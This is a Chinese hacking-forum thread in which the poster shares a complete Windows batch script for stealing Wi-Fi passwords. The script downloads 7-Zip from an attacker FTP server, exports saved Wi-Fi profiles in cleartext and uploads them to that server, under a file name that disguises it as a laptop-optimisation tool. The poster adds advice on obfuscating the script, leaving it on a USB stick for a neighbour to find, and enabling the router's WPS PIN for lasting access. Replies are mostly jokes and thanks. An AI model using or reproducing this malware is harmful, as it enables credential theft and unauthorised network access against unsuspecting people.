吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

上一主题 下一主题

[原创工具] 一个用来偷wifi密码的软件

关闭 [复制链接]
楼主
KeCheng 发表于 2017-8-11 11:48 回帖奖励

今天看到这篇本地wifi密码获取的文章

https://www.52pojie.cn/thread-632199-1-1.html

于是想起了我曾经编写的“wifi密码窃取器”这个程序大致是“发给别人让他运行,然后他的wifi密码就能发回到你搭建的ftp服务器(也可以放进优盘或者制作badusb,然后把优盘丢到想蹭网的人家门口,等他捡到后插电脑上运行)”,给大家分享一下。

程序原理是在运行程序后,利用 netsh wlan export profile key=clear folder=c:\ 命令将本地的密码导出,然后打包发给黑客搭建的ftp服务器

工作原理:

1.程序运行后,从指定ftp服务器“123.123.123.123”上下载7z.exe和7z.dll,一会打包密码用

2.获取密码,使用7z.exe和7z.dll打包压缩。

3.把压缩包发回ftp

这个程序是一个bat批处理程序,能够在win7下运行,将下面的代码保存为“笔记本性能优化【第一次使用可能运行时间稍长】.bat”(伪装成笔记本性能优化软件)的批处理程序即可。

下面是代码(里面的123.123.123.13修改为自己的ftp的地址,ftp用户名写自己的ftp用户名,ftp密码写自己的ftp密码,提前把7z.exe和7z.dll放到ftp根目录

[ColdFusion] 纯文本查看 复制代码
@echo off
@title 笔记本电脑优化
@mode con lines 14 cols 14
@color 01
echo open 123.123.123.123>C:\config.txt
cls
echo user ftp用户名>>C:\config.txt
cls
echo ftp密码>>C:\config.txt
cls
echo get "7z.dll" "C:\7z.dll">>C:\config.txt
cls
echo get "7z.exe" "C:\7z.exe">>C:\config.txt
cls
echo binary>>C:\config.txt
cls
echo bye>>C:\config.txt
cls
ftp -n -s:"C:\config.txt"
cls
del C:\config.txt
cls
netsh wlan export profile key=clear folder=c:\&&c:\7z a -tzip c:\wifipwd.7z c:\*.xml&&del /f /q c:\*.xml
cls
echo open 123.123.123.123>C:\config.txt
cls
echo user ftp用户名>>C:\config.txt
cls
echo ftp密码>>C:\config.txt
cls
echo put "C:\wifipwd.7z" "\wifipwd.7z">>C:\config.txt
cls
echo binary>>C:\config.txt
cls
echo bye>>C:\config.txt
cls
ftp -n -s:"C:\config.txt"
cls
del C:\config.txt
del C:\wifipwd.7z
del C:\7z.exe
del C:\7z.dll
cls

7z.exe和7z.dll这两个程序是我们提前放在ftp服务器ftp根目录下的。当我们的窃取密码的批处理程序运行时,就会链接ftp服务器,把7z.exe和7z.dll下载到本地。如果没有被安全软件拦截的话,包含了无线密码的压缩包会被发到ftp上,内容如下:

一个wifi一个xml文件

随便打开一个xml文件,图片中标出的那一行就是该wifi的密码:

由于批处理文件是明文的,如果右键批处理,选择编辑,就会看到源码,这样非常不安全(ftp地址和账户密码都暴露了),所以最好自己找一个bat加密程序来为我们的窃取器加一下密。

加密后要本机测试,能成功运行后再发给别人!

获取无线网络密码.rar (699.68 KB, 下载次数: 1909)

百度云下载链接: https://pan.baidu.com/s/1hr8vBMG 密码: gh2f

最后发现邻居路由都是绑定设备MAC的,23333333  发表于 2017-9-18 17:07
特地过来顶贴,楼主666  发表于 2017-8-11 18:51
不错支持下~~大佬666  发表于 2017-8-11 12:06

免费评分

郑志灿 + 1 + 1 我很赞同!
一颗小小小白菜 + 1 谢谢@Thanks!
hzbwer + 1 + 1 有这闲工夫还不如去买个360WIFI
xiao1193687 + 1 + 1 我很赞同!
zjxpioneer + 1 + 1 谢谢@Thanks!
艂gg + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
hqy0606 + 1 我很赞同!
miao58598 + 1 + 1 已答复!
冥月影 + 1 谢谢@Thanks!
wenda_28 + 1 + 1 牛逼!
missugr + 1 用一个U盘,换1个WIFI密码?Excuse me?
小九哥 + 1 热心回复!
xuq1981 + 1 + 1 谢谢@Thanks!
helloooworlddd + 1 + 1 谢谢@Thanks!
zhanglitao + 1 + 1 热心回复!
sun--zly + 1 + 1 厉害
ExtraZom + 1 + 1 谢谢@Thanks!
xieruhui + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
杏仁 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
wosihumang + 1 + 1 谢谢@Thanks!
z7311873 + 1 + 1 丢u盘 哈哈哈哈哈哈 ,亏你想得出。
suntech + 1 我就服丢6个U盘的大神
零下零一度 + 1 + 1 谢谢@Thanks!
ASKZ晨风 + 1 谢谢@Thanks!
baimirror + 1 + 1 我很赞同!
猥琐也是种美 + 1 + 1 我很赞同!
dulian + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
wow999 + 1 + 1 双十一买的几个U盘都喂鱼了,到现在还啥都没钓到
reveanime + 1 + 1 谢谢@Thanks!
qzeng + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
codz + 1 + 1 我很赞同!
雙魚座 + 1 + 1 666
1111gwy + 1 + 1 用心讨论,共获提升!
martinliu + 1 谢谢@Thanks!
bdk236 + 1 + 1 楼主是告诉我们:捡到的U盘要拿到网吧格式化再运行
叫什么名字呢 + 1 + 1 用心讨论,共获提升!
kthereal + 1 我很赞同!
梦儿小虐 + 1 + 1 热心回复!
nicelulu + 1 + 1 我很赞同!
whq0914 + 1 U盘太少了
何以致用 + 1 + 1 用心讨论,共获提升!
Ward01 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
yuantao921 + 1 + 1 我很赞同!
cenleij + 1 + 1 我很赞同!
Jiezli + 1 用心讨论,共获提升!
Boc大鱼 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
Liang.XH + 1 我很赞同!
1212126000 + 1 + 1 我很赞同!
alstar + 1 反馈密码不爽,要是把U盘跟密码都返回来才好。
gb1855988 + 1 + 1 厉害的大表哥
该隐少年 + 1 + 1 拿了你的u盘再给你拉黑,蹭网,不存在的!
Crush + 1 用心讨论,共获提升!
Au_L + 1 + 1 谢谢@Thanks! 同理是不是可以做一个U盘的操作历史记录
mixrain + 1 + 1 楼主,送U盘吗
是非是谁 + 1 + 1 谢谢@Thanks!
莫奇 + 1 + 1 谢谢@Thanks!
荆云 + 1 + 1 谢谢@Thanks!
MIRBOOM + 1 + 1 谢谢@Thanks!
无限挑战 + 1 感觉还不如直接送邻居个u盘 然后蹭网
zhangli1314 + 1 + 1 讲真,我都丢了23个u盘了,一个密码也没套到
jimmy091 + 1 + 1 谢谢@Thanks!
za最爱高清 + 1 啊哈哈,真希望邻居来蹭网,我给他限速1kb
虚鸣一 + 1 + 1 我很赞同!
有我在 + 1 + 1 热心回复!
wrmfw + 1 + 1 热心回复!
大灰狼520 + 1 我已经丢了6个U盘了,一个也没钓到啊。。。
a1120317112 + 1 + 1 用心讨论,共获提升!
xnzhan + 1 + 1 谢谢@Thanks!
5scommander + 1 热心回复!
函谷关 + 1 + 1 谢谢@Thanks!
琪a + 1 + 1 我很赞同!
whychobits + 1 + 1 谢谢@Thanks!
lonebca + 1 + 1 谢谢@Thanks!
pony52 + 1 + 1 热心回复!
shamrock. + 1 不知道能不能逃过360法网
Magityin + 1 + 1 我很赞同!
zym8058 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
AlphaGo + 1 + 1 谢谢@Thanks!
qq80107525 + 1 + 1 智能路由,手机app一键就拉黑了,白忙。
hdandty + 1 + 1 谢谢@Thanks!
long437933622 + 1 + 1 类似钓鱼
tunis + 1 + 1 用心讨论,共获提升!
sdacan + 1 + 1 我很赞同!
lzkuan + 1 + 1 热心回复!
ckmax + 1 用心讨论,共获提升!
韦雷锋 + 1 + 1 热心回复!
doing42524 + 1 + 1 我很赞同!
闭关修炼 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
ak407 + 1 我很赞同!
幽默剧本 + 1 + 1 我很赞同!
爱阳阳 + 1 + 1 谢谢@Thanks!
mirkeyang + 1 + 1 我很赞同!
angelsfeather + 1 + 1 我很赞同!
crac + 1 + 1 我很赞同!
yjp2581314 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
pass101 + 1 + 1 已答复!
chrisming + 1 热心回复!
shanijiba + 1 + 1 我很赞同!
896965691 + 1 这个需要U盘的,还是算了。
白帽子 + 1 用心讨论,共获提升!

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
 楼主| KeCheng 发表于 2017-8-14 14:38 |楼主
blacky 发表于 2017-8-14 13:38
如果他格式化u盘或改WiFi密码那不是很亏?

首先买个最最便宜的优盘,然后给优盘贴上一个纸质标签,上面写“**照片”。(诱使他查看文件)。

获取密码后,尝试登录路由器,开启pin码,这样不管他怎么改信号,咱们用同一个PIN码就可以登录了

免费评分

蒸馏水 + 1 + 1 我很赞同!
lmeiz888 + 1 + 1 谢谢@Thanks!

推荐
ajian00athrun 发表于 2017-8-22 14:31
推荐
 楼主| KeCheng 发表于 2017-8-11 23:51 |楼主
fw19920506 发表于 2017-8-11 21:38
这个属于钓鱼吧!不过让别人运行这种陌生软件还是很有难度的啊!

对,就是钓鱼,不过吧。一般你想蹭网,都是在自己家附近的,你整一个20块钱U盘,把这个程序丢进去(起一个诱惑的名字),然后放到想蹭网的人家门口
沙发
qiangcxq 发表于 2017-8-11 11:55
这什么原理
冰雨轩 发表于 2017-8-11 11:57
有什么用了1这个
03290815 发表于 2017-8-11 11:57
没看懂偷谁的密码
Difta 发表于 2017-8-11 11:58 来自手机
感谢分享
changluo 发表于 2017-8-11 12:01
专门人士才用,,,一般人还真用不了
liuxinming67 发表于 2017-8-11 12:01
还是自己的密码……
liangxia01 发表于 2017-8-11 12:01
感觉不用偷这么麻烦啊
ZHEyang 发表于 2017-8-11 12:01
感谢分享 这个有点6
kinglongzql 发表于 2017-8-11 12:03 来自手机
感谢分享